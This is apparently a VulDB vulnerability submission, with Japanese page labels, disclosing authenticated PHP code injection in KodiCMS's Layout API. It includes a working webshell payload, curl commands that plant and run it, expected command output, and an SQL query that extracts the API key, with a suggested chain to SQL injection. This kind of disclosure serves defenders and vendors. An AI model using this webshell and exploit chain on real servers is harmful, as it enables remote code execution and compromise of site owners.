| タイトル | KodiCMS https://github.com/KodiCMS-Kohana/cms 13.82.135 Code Injection |
|---|
| 説明 | # Arbitrary PHP Code Execution via Layout API in KodiCMS
**BUG_Author:** Security Researcher
**Affected Version:** KodiCMS ≤ 13.82.135 (all versions)
**Vendor:** [KodiCMS-Kohana GitHub Repository](https://github.com/KodiCMS-Kohana/cms)
**Software:** [KodiCMS](https://github.com/KodiCMS-Kohana/cms)
**Vulnerability Files:**
- `cms/modules/kodicms/classes/kodicms/model/file.php`
- `cms/modules/kodicms/classes/kodicms/controller/api/layout.php`
## Description:
1. **Arbitrary PHP Code Execution via Layout API:**
- In the file `cms/modules/kodicms/classes/kodicms/model/file.php`, the `save()` function uses `file_put_contents()` to write user-controlled content directly to PHP files without any sanitization.
- The Layout API endpoint allows authenticated users to create or modify layout files with arbitrary PHP code.
2. **Exploiting the Vulnerability:**
- By sending a crafted PUT request to the Layout API endpoint with malicious PHP code in the `content` parameter, an attacker can create a webshell on the server.
- The created PHP file is stored in the `/layouts/` directory which is publicly accessible via web browser.
3. **Example Webshell Payload:**
- The following payload can be used to create a webshell:
```
<?php echo 'PWNED';system($_GET['c']);?>
```
4. **Requesting the Layout API Endpoint:**
- Make a PUT request to the Layout API endpoint with the webshell payload:
```
PUT /backend/api-layout?api_key=<API_KEY>&name=shell&content=<URL_ENCODED_PAYLOAD>
```
5. **Verifying the Exploit:**
- If the injection is successful, the webshell will be accessible at `/layouts/shell.php` and can execute arbitrary system commands.
## Prerequisites:
**API Key Acquisition:**
The API key can be obtained through the following methods:
1. **Database Access:** If an attacker has database access (e.g., via SQL injection), the API key can be extracted from the `config` table:
```sql
SELECT config_value FROM config WHERE group_name='api' AND config_key='key';
```
2. **Admin Panel Access:** Administrators can view the API key in the backend settings panel under API configuration.
3. **Configuration File:** The API key is stored in serialized format in the database and may be cached in configuration files.
**Note:** This vulnerability requires a valid API key or authenticated admin session. However, when combined with the SQL Injection vulnerability (CVE pending), an attacker can first extract the API key from the database and then use it to exploit this vulnerability for Remote Code Execution.
## Proof of Concept:
1. Create a webshell using the Layout API:
```bash
curl -s -X PUT "http://<target-ip>/backend/api-layout?api_key=<API_KEY>&name=shell&content=%3C%3Fphp%20echo%20%27PWNED%27%3Bsystem%28%24_GET%5B%27c%27%5D%29%3B%3F%3E"
```
2. Verify the webshell was created:
```bash
curl "http://<target-ip>/layouts/shell.php"
```
3. Execute arbitrary commands on the server:
```bash
curl "http://<target-ip>/layouts/shell.php?c=id"
```
4. Expected output:
```
PWNEDuid=33(www-data) gid=33(www-data) groups=33(www-data)
```
## Vulnerable Code:
**File:** `cms/modules/kodicms/classes/kodicms/model/file.php` (Line 437)
```php
public function save()
{
// ... validation code ...
return file_put_contents($this->_file, $this->_content) !== FALSE;
}
```
**File:** `cms/modules/kodicms/classes/kodicms/controller/api/layout.php` (Line 53-73)
```php
public function rest_put()
{
$layout = new Model_File_Layout($this->param('name', NULL, TRUE));
$layout->content = $this->param('content', NULL); // User input directly assigned
$status = $layout->save(); // Writes to PHP file without sanitization
// ...
}
``` |
|---|
| ユーザー | hiro (UID 93548) |
|---|
| 送信 | 2025年12月18日 03:26 (6 月 ago) |
|---|
| モデレーション | 2025年12月31日 10:17 (13 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 339162 [Kohana KodiCMS 迄 13.82.135 Layout API Endpoint file.php save content 特権昇格] |
|---|
| ポイント | 17 |
|---|